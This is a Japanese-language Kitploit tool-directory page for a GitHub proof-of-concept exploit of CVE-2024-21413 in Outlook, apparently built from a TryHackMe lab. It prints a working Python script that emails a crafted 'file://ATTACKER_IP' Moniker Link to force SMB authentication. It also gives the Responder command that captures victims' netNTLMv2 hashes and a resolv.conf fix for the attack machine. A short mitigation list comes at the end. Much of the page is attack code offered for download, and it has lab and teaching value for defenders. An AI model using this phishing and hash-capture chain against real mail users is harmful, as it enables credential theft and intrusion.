Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Email-exploit-Moniker-Link-CVE-2024-21413- — CVE-2024-21413 の概念実証エクスプロイト。HTML メール内の Moniker Link を使用して SMB 接続をトリガーし、Responder を介して netNTLMv2 ハッシュをキャプチャします。ペネトレーションテスト、Python スクリプティング、ネットワークプロトコル分析スキルを示します。 | Kitploit
ツール/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
パスワードクラッキングエクスプロイトフィッシングネットワークセキュリティペネトレーションテスト学習と教育レッドチーミングメールセキュリティラボと実践

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
GitHubyass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

CVE-2024-21413 の概念実証エクスプロイト。HTML メール内の Moniker Link を使用して SMB 接続をトリガーし、Responder を介して netNTLMv2 ハッシュをキャプチャします。ペネトレーションテスト、Python スクリプティング、ネットワークプロトコル分析スキルを示します。

リポジトリを見る
11ヶ月前未レビュー

Email exploit Moniker Link-CVE-2024-21413-Module — ドキュメント

概要: OutlookからSMB接続を誘発するMoniker LinkをHTMLメールで使用し、Responderを介して被害者のnetNTLMv2ハッシュをキャプチャする実用的なPoC。ペネトレーションテスト、スクリプティング、ネットワークプロトコル分析における実践的なスキルを示します。


実証される主要スキル

  • 自動メール配信のためのPythonスクリプティング
  • SMB、NTLMv2、LLMNR、NBT-NS、MDNSプロトコルの理解
  • ハッシュキャプチャのためのResponderの設定と監視
  • Linuxネットワーク/DNS設定の問題のトラブルシューティング
  • ラボ環境での制御された攻撃シナリオの作成

PoCのワークフロー

  1. SMBリスナーのセットアップ: 攻撃マシンでResponderを起動し、SMB認証試行を監視します。
  2. 細工されたメールの送信: Pythonスクリプトを使用して、攻撃者のSMB共有を指すMoniker Link(file://)を含むHTMLメールを配信します。
  3. ハッシュキャプチャ: 被害者がリンクをクリックすると、OutlookがSMB経由でファイルを取得しようとし、ResponderがnetNTLMv2ハッシュをキャプチャします。

最小限のエクスプロイトスクリプト

root@kitploit:~
# exploit.py (トリミング)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTPサーバー
password = input('攻撃者のメールパスワードを入力: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('メールを配信しました')

ヒント: 実行前にATTACKER_IPとmailserverを置き換えてください。TryHackMeラボではパスワードはattackerです。


Responderの実行

root@kitploit:~
responder -I ens5

ens5を自分のネットワークインターフェース名に置き換えてください。


/etc/resolv.confのトラブルシューティング

Responderが/etc/resolv.confのシンボリックリンクの問題で失敗することがあります。次のように修正します:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

強調されるスキル: Linuxトラブルシューティング、DNS設定、クラウド/VM環境へのツール適応。


進行状況スクリーンショット

  1. エラー / resolv.conf問題: Error Resolv.conf

  2. DNS修正適用: DNS Setup Fix

  3. Pythonメールスクリプト: Python Email Script

  4. エクスプロイト配信: Exploit Delivery

  5. 被害者の受信トレイ: Victim Email

  6. キャプチャした被害者のハッシュ: Captured Victim Hash


使用したツールとコマンド

  • Responder: SMB/LLMNR/NBT-NS/MDNSリスナー
  • Python3: PoCメールスクリプトの実行
  • smtplib / email.mime: メール作成・送信用Pythonライブラリ
  • DNSトラブルシューティング用Linuxシェルコマンド

学んだスキル / ポートフォリオのハイライト

  • ネットワーク攻撃シミュレーションとエクスプロイトのワークフロー
  • ソーシャルエンジニアリングベクター(Moniker Linkメール)の自動化
  • netNTLMv2ハッシュのキャプチャと分析
  • 分野横断的なトラブルシューティング: Python、ネットワーキング、WindowsとLinuxの相互作用
  • 技術レビュアー向けのドキュメント化とワークフロー提示

緩和策と防御メモ

  • Outlookで自動外部コンテンツを無効にする
  • 信頼できないネットワークへの送信SMBをブロックする
  • WindowsクライアントでSMB署名と最新の認証ポリシーを強制する

帰属

TryHackMe MonikerLinkラボとCMNaticによるオリジナルPoCを改変(GitHub)

ツールをダウンロード